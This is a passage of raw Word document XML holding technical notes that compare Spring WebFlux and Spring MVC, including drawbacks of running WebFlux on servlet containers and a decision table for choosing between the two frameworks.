                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> are </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>limited</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> in servlet-based environments.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="1FA6D2BE" w14:textId="77777777" w:rsidTr="005953AF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B82E4B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5. Less Efficient Backpressure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="678CCD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backpressure support is </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>less effective</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> than in Netty, which is designed for it natively.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="6B8793C7" w14:textId="77777777" w:rsidTr="005953AF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DEF95B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6. Resource Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B50883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threads are typically required under load, </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>reducing scalabil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increasing memory consumption</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="28A8855D" w14:textId="77777777" w:rsidTr="005953AF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B3D30A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7. Deployment Complexity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05805E26"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Deploying in a servlet container may involve more complex setup to ensure </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>non-blocking compliance</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> from filters, servlets, or other libraries.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6411050B"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45041">
          <v:rect id="_x0000_i2345" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFB630A"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lastRenderedPageBreak/>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> When is it acceptable to use Servlet container with WebFlux?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761373FC"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gradually migrating from Spring MVC to WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6355866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infrastructure requires running inside a servlet container like Apache Tomcat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631200F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pp load is predictable and low to moderate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BD1FD6"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7C772">
          <v:rect id="_x0000_i2346" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="267B2F7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5ED95A3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aiming for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>maximum scalability, non-blocking performance, and full reactive features</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, prefer running Spring WebFlux on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5368178D"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etty (default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5C4EF1"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alternatives lik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fully reactive), instead of servlet containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4D61C4" w14:textId="77777777" w:rsidR="005953AF" w:rsidRPr="00CE4B95" w:rsidRDefault="005953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Would you like to see benchmark comparisons or a config example for switching to Netty?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E0F0E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347" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B86E5F2" w14:textId="02B03D50"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49" w:name="_Toc197867763"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you decide whether to use Spring WebFlux or Spring MVC for your application</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="549"/>
    </w:p>
    <w:p w14:paraId="033BAEBE" w14:textId="16D2A802" w:rsidR="00585C01" w:rsidRPr="00B13F85" w:rsidRDefault="00585C0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should decide betwee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based on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nature of your application, performance needs, and ecosystem</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Here’s a detailed comparison to guide the decision:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AB4E45"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7B7B5">
          <v:rect id="_x0000_i2348" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE67D1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7917"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="04B4CFBF" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E59CBE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25F009C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WebFlux?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="1FC04BAF" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="279296C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 Concurrency / I/O Bound</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DAFE3BB"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apps with many concurrent requests (e.g. streaming data, chat, APIs calling remote services) where response time is impacted by I/O latency.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="1DCD3F76" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F244EB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Sources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EEDA48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e using </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>reactive databases</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (e.g. MongoDB with Reactive Streams, R2DBC) or calling </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>reactive APIs</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="40FB4AB9" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66084DB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 is critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="679B04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uses fewer threads (event-loop model) → </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>high scalability with lower resource usage</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="0C7E0D00" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="036E6D08"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 Real-time Use Cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E598CDF"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erfect for apps that need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xml:space="preserve">, SSE, or </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>live data updates</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="7FFD2A1F" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AC55F2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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60DFAD0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w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>reactive backpressure support</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> to avoid overloading downstream systems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="3FA23458" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E45E5E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loud-native, microservices-first</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A9134C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ful in distributed systems whe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behavior can lead to better resource utilization.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4CBEF872"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F7EEF">
          <v:rect id="_x0000_i2349" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="554E1D8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7787"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="507A3417" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30CED3E0"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09A3157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MVC?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="422E7B8B" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B2D3E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CRUD App</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11BE07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VC is </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>simpler</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> for most synchronous use cases (CRUD apps with relational DBs like MySQL).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="005E00D1" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C4652C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ing JPA / Hibernate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00E230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JPA is blocking; works </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>better with MVC</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> than WebFlux.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="4EE5D3D8" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="315211B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Concurrency Apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="347D886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don’t require high concurrency or deal with slow remote services.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="3AAE7AB7" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61FCE0C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ider Third-Party Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D4928C9"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any libraries (e.g., security filters, logging tools) ar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nd built for servlet stack.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="4723EF45" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52A6943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am Familiarity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B903A9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 team is more experienced with the traditional model and blocking operations, MVC is </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>easier to maintain</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="0536D112" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="489F0A0D"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ning on Servlet Containers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="185162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sier to use if you must deploy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Jetty</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>, or similar.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="22FF3FC3"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57683">
          <v:rect id="_x0000_i2350" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="353DD35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Hybrid Strategy (if needed):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE2611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needed, you can have </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebFlux co-exist with MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the same app, but they’ll work on different controllers and configurations. However, this is rarely recommended due to complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB47691"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B03157">
          <v:rect id="_x0000_i2351" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
